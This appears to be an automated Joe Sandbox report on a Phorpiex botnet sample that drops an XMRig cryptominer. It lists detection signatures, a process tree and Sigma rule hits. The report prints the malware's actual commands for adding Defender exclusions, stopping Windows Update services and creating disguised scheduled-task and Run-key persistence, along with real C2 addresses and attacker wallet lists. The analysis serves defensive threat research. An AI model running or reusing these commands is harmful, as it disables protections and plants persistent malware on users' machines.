Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Us051y7j25.exe

Overview

General Information

Sample name:Us051y7j25.exe
renamed because original name is a hash value
Original sample name:fdbf0c19ebcafcf5e4295edc9e4a37836ba580b9a4d63b2a9ccdf8418ed5fe84.exe
Analysis ID:1542687
MD5:82894caeb7e149bb38d344fbc2a821d9
SHA1:bf86bd33666e58f291bc9135a95f67a7483cde52
SHA256:fdbf0c19ebcafcf5e4295edc9e4a37836ba580b9a4d63b2a9ccdf8418ed5fe84
Tags:CoinMinerexeuser-JAMESWT_MHT
Infos:

Detection

Phorpiex, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop multiple services
Suricata IDS alerts for network traffic
Yara detected Phorpiex
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to check if Internet connection is working
Contains functionality to detect sleep reduction / modifications
Detected Stratum mining protocol
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Found hidden mapped module (file has been removed from disk)
Found strings related to Crypto-Mining
Hides that the sample has been downloaded from the Internet (zone.identifier)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • Us051y7j25.exe (PID: 5348 cmdline: "C:\Users\user\Desktop\Us051y7j25.exe" MD5: 82894CAEB7E149BB38D344FBC2A821D9)
    • 21324.scr (PID: 4416 cmdline: "C:\Users\user\AppData\Local\Temp\21324.scr" /S MD5: 06560B5E92D704395BC6DAE58BC7E794)
      • sysppvrdnvs.exe (PID: 1588 cmdline: C:\Windows\sysppvrdnvs.exe MD5: 06560B5E92D704395BC6DAE58BC7E794)
        • cmd.exe (PID: 3552 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2052 cmdline: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 6212 cmdline: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 6488 cmdline: sc stop UsoSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • sc.exe (PID: 1220 cmdline: sc stop WaaSMedicSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • sc.exe (PID: 6364 cmdline: sc stop wuauserv MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • sc.exe (PID: 6484 cmdline: sc stop DoSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • sc.exe (PID: 3360 cmdline: sc stop BITS /wait MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
        • 1881231804.exe (PID: 3180 cmdline: C:\Users\user\AppData\Local\Temp\1881231804.exe MD5: CB8420E681F68DB1BAD5ED24E7B22114)
          • cmd.exe (PID: 6672 cmdline: "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 2812 cmdline: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • cmd.exe (PID: 5696 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 5224 cmdline: schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • 2314627202.exe (PID: 5792 cmdline: C:\Users\user\AppData\Local\Temp\2314627202.exe MD5: 0C37EE292FEC32DBA0420E6C94224E28)
        • 1091722296.exe (PID: 5112 cmdline: C:\Users\user\AppData\Local\Temp\1091722296.exe MD5: 96509AB828867D81C1693B614B22F41D)
          • 1239611256.exe (PID: 2052 cmdline: C:\Users\user\AppData\Local\Temp\1239611256.exe MD5: 13B26B2C7048A92D6A843C1302618FAD)
        • 146916724.exe (PID: 6992 cmdline: C:\Users\user\AppData\Local\Temp\146916724.exe MD5: 5A0D146F7A911E98DA8CC3C6DE8ACABF)
  • sysppvrdnvs.exe (PID: 4492 cmdline: "C:\Windows\sysppvrdnvs.exe" MD5: 06560B5E92D704395BC6DAE58BC7E794)
  • powershell.exe (PID: 3184 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • winupsecvmgr.exe (PID: 4044 cmdline: "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe" MD5: 13B26B2C7048A92D6A843C1302618FAD)
    • conhost.exe (PID: 7112 cmdline: C:\Windows\System32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dwm.exe (PID: 6072 cmdline: C:\Windows\System32\dwm.exe MD5: 5C27608411832C5B39BA04E33D53536C)
  • powershell.exe (PID: 6952 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6432 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • winupsecvmgr.exe (PID: 5352 cmdline: "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe" MD5: 13B26B2C7048A92D6A843C1302618FAD)
  • powershell.exe (PID: 5424 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
PhorpiexProofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
{"C2 url": ["http://185.215.113.66/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "UQAbBKbfkiK3Gjo86zgD3yYO5Njf7zxPTEO4JLqN13ruoGDb"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\21324.scrJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\tdrpl[1].exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
        C:\Windows\sysppvrdnvs.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
          C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
            • 0x4cb268:$a1: mining.set_target
            • 0x4c6a48:$a2: XMRIG_HOSTNAME
            • 0x4c8540:$a3: Usage: xmrig [OPTIONS]
            • 0x4c6a20:$a4: XMRIG_VERSION
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            00000012.00000000.2471335406.0000000000410000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
              00000003.00000002.2377755472.0000000000410000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                00000004.00000000.2367149756.0000000000410000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                  00000003.00000000.2346481586.0000000000410000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                    00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                      Click to see the 10 entries
                      SourceRuleDescriptionAuthorStrings
                      4.2.sysppvrdnvs.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                        3.2.21324.scr.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                          4.0.sysppvrdnvs.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                            18.0.sysppvrdnvs.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                              3.0.21324.scr.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                                Click to see the 17 entries

                                Operating System Destruction

                                barindex
                                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, CommandLine: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\sysppvrdnvs.exe, ParentImage: C:\Windows\sysppvrdnvs.exe, ParentProcessId: 1588, ParentProcessName: sysppvrdnvs.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, ProcessId: 6212, ProcessName: cmd.exe

                                System Summary

                                barindex
                                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, ProcessId: 3184, ProcessName: powershell.exe
                                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, ProcessId: 3184, ProcessName: powershell.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\sysppvrdnvs.exe, ParentImage: C:\Windows\sysppvrdnvs.exe, ParentProcessId: 1588, ParentProcessName: sysppvrdnvs.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ProcessId: 3552, ProcessName: cmd.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\sysppvrdnvs.exe, ParentImage: C:\Windows\sysppvrdnvs.exe, ParentProcessId: 1588, ParentProcessName: sysppvrdnvs.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ProcessId: 3552, ProcessName: cmd.exe
                                Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\Us051y7j25.exe, ProcessId: 5348, TargetFilename: C:\Users\user\AppData\Local\Temp\21324.scr
                                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\Us051y7j25.exe, ProcessId: 5348, TargetFilename: C:\Users\user\AppData\Local\Temp\21324.scr
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\sysppvrdnvs.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\21324.scr, ProcessId: 4416, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings
